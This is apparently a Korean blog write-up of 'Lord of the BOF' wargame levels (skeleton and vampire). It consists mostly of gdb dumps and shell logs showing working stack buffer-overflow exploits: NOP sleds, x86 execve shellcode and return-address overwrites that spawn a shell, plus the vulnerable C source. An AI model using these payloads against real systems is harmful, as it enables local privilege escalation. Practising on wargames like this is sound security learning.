0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

0xc0000004: Cannot access memory at address 0xc0000004

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

0xbffffac4: "\004??f?퓀8\001@\001"

0xbffffad2: ""

0xbffffad3: ""

0xbffffad4: "P\204\004\b"

0xbffffad9: ""

(gdb)

0xbffffada: ""

0xbffffadb: ""

0xbffffadc: "q\204\004\b"

0xbffffae1: "\205\004\b\001"

0xbffffae6: ""

0xbffffae7: ""

0xbffffae8: "\004??220\203\004\b?206\004\b`?

0xbffffaf7: "@斅?220>\001@\001"

0xbffffb02: ""

0xbffffb03: ""

(gdb)

0xbffffb04: "港?

0xbffffb09: ""

0xbffffb0a: ""

0xbffffb0b: ""

0xbffffb0c: "1?풱???퓃??212??232?였?왐?욹?웝??t?풪???퓍??204??221?염?옹?왜?욜?월??001??

0xbffffb65: ""

0xbffffb66: ""

0xbffffb67: ""

0xbffffb68: "\003"

0xbffffb6a: ""

(gdb)

0xbffffb6b: ""

0xbffffb6c: "4\200\004\b\004"

0xbffffb72: ""

0xbffffb73: ""

0xbffffb74: " "

0xbffffb76: ""

0xbffffb77: ""

0xbffffb78: "\005"

0xbffffb7a: ""

0xbffffb7b: ""

(gdb)

0xbffffb7c: "\006"

0xbffffb7e: ""

0xbffffb7f: ""

0xbffffb80: "\006"

0xbffffb82: ""

0xbffffb83: ""

0xbffffb84: ""

0xbffffb85: "\020"

0xbffffb87: ""

0xbffffb88: "\a"

(gdb)

0xbffffb8a: ""

0xbffffb8b: ""

0xbffffb8c: ""

0xbffffb8d: ""

0xbffffb8e: ""

0xbffffb8f: "@\b"

0xbffffb92: ""

0xbffffb93: ""

0xbffffb94: ""

0xbffffb95: ""

(gdb)

0xbffffb96: ""

0xbffffb97: ""

0xbffffb98: "\t"

0xbffffb9a: ""

0xbffffb9b: ""

0xbffffb9c: "P\204\004\b\013"

0xbffffba2: ""

0xbffffba3: ""

0xbffffba4: "?001"

0xbffffba7: ""

(gdb)

0xbffffba8: "\f"

0xbffffbaa: ""

0xbffffbab: ""

0xbffffbac: "?001"

0xbffffbaf: ""

0xbffffbb0: "\r"

0xbffffbb2: ""

0xbffffbb3: ""

0xbffffbb4: "?001"

0xbffffbb7: ""

(gdb)

0xbffffbb8: "\016"

0xbffffbba: ""

0xbffffbbb: ""

0xbffffbbc: "?001"

0xbffffbbf: ""

0xbffffbc0: "\020"

0xbffffbc2: ""

0xbffffbc3: ""

0xbffffbc4: "螢\017\017"

0xbffffbca: ""

(gdb)

0xbffffbcb: ""

0xbffffbcc: "憔?

0xbffffbd1: ""

0xbffffbd2: ""

0xbffffbd3: ""

0xbffffbd4: ""

0xbffffbd5: ""

0xbffffbd6: ""

0xbffffbd7: ""

0xbffffbd8: ""

(gdb)

0xbffffbd9: ""

0xbffffbda: ""

0xbffffbdb: ""

0xbffffbdc: ""

0xbffffbdd: ""

0xbffffbde: ""

0xbffffbdf: ""

0xbffffbe0: ""

0xbffffbe1: ""

0xbffffbe2: ""

(gdb)

0xbffffbe3: ""

0xbffffbe4: ""

0xbffffbe5: ""

0xbffffbe6: ""

0xbffffbe7: ""

0xbffffbe8: ""

0xbffffbe9: ""

0xbffffbea: ""

0xbffffbeb: ""

0xbffffbec: ""

(gdb)

0xbffffbed: ""

0xbffffbee: ""

0xbffffbef: ""

0xbffffbf0: ""

0xbffffbf1: ""

0xbffffbf2: ""

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb)

0xbffffe01: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

0xbffffec9: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...

0xbfffff91: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"

0xbfffffc4: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffffc: ""

0xbffffffd: ""

0xbffffffe: ""

0xbfffffff: ""

0xc0000000: <Address 0xc0000000 out of bounds>

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ oh shit

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

GNU gdb 19991004

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

쉘코드는 지난번에 사용한 2f없는것도 왠일로 안먹길래,, 그리고 ~~2f들어가는거 심볼릭 링크로 하는거 배웠는데 손이랑 머리가 고자라 기억못해서~~ 삽질끝에 풀이에서 가져왔어요. 쉘코드 출처:http://john-data.tistory.com/187

풀이는 안봤어요 히힣ㅎ히히히히히히 보려고도 했으나 엄청나게 설명이 많아서 그냥 다 때려치고 학교프로젝트도 때려치고 이것만 때려잡으려는찰나에 히히힣ㅎ히히히히히

잡담은 그만하고 정리한 로그 보여드릴께요.

//bash 2, ./ssssssss는 복사본.

[vampire@localhost vampire]$ ls

skeleton skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

/*

The Lord of the BOF : The Fellowship of the BOF

- skeleton

- argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

// argc saver

saved_argc = argc;

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40); //버퍼 사라짐

// ultra argv hunter!

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i])); //argv를 다 각각의 크기만큼을 0으로 덮어버림

}

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

(중략)

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q //여기서 앞에 nop를 안넣었다는 사실을 알아챔. 읽고 찾기 힘들어서 nop를 채웠습니다.

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ ~~oh shit~~ //원본 프로그램 날림 이히히히히 권한이 사라졌따!

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

...

중간에 프로그램을 날린 관계로

키는 찾아서 하겠습니다...ㅋ

아 안그래도 요즘 정신적으로 너무 힘든데 그나마 힐링되네요 힐링♥︎

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

golem->darkknight (0)	2014.04.06
skeleton->golem (5)	2014.03.17
troll->vampire (0)	2013.12.22
orge->troll (0)	2013.12.21
darkelf->orge (0)	2013.11.22

흐아아앗!

흐콰한다!!

[troll@localhost troll]$ cat vampire.c

/*

The Lord of the BOF : The Fellowship of the BOF

- vampire

- check 0xbfff

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// here is changed!

if(argv[1][46] == '\xff') //페이로드의 47번째, 즉 ret부분의 주소가 \xbfff~~ 형식이 아니어야 합니다

{

printf("but it's not forever\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44, "\xff\xff\xfe\xbf", "\x90"x70000, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜???????????????????????????????????????????????????????????????????????????????????????????????????????????

(...생략)

????????????????????????????????j

X?Rh//shh/bin??S?訴

bash$ my-pass

euid = 509

처음봤을땐 '어미친 이거 뭔소리야' 이랬는데

스택은 메모리가 큰주소에서 작은주소로 자라잖아여!! 그래서 늘리는거야!! 쭉쭉!!!!

처음에는 0xbfffffff를 기준으로 nop를 넣거나 코어로 esp의 주소를 보고 그 기준으로 0xbffeffff까지의 거리를 재려고 했으나 그냥 대충 0xbfffffff 에서 0xbffeffff까지의 거리를 계산해서 nop를 마구 넣었더랬죠! (7만개 으캬캬컄)

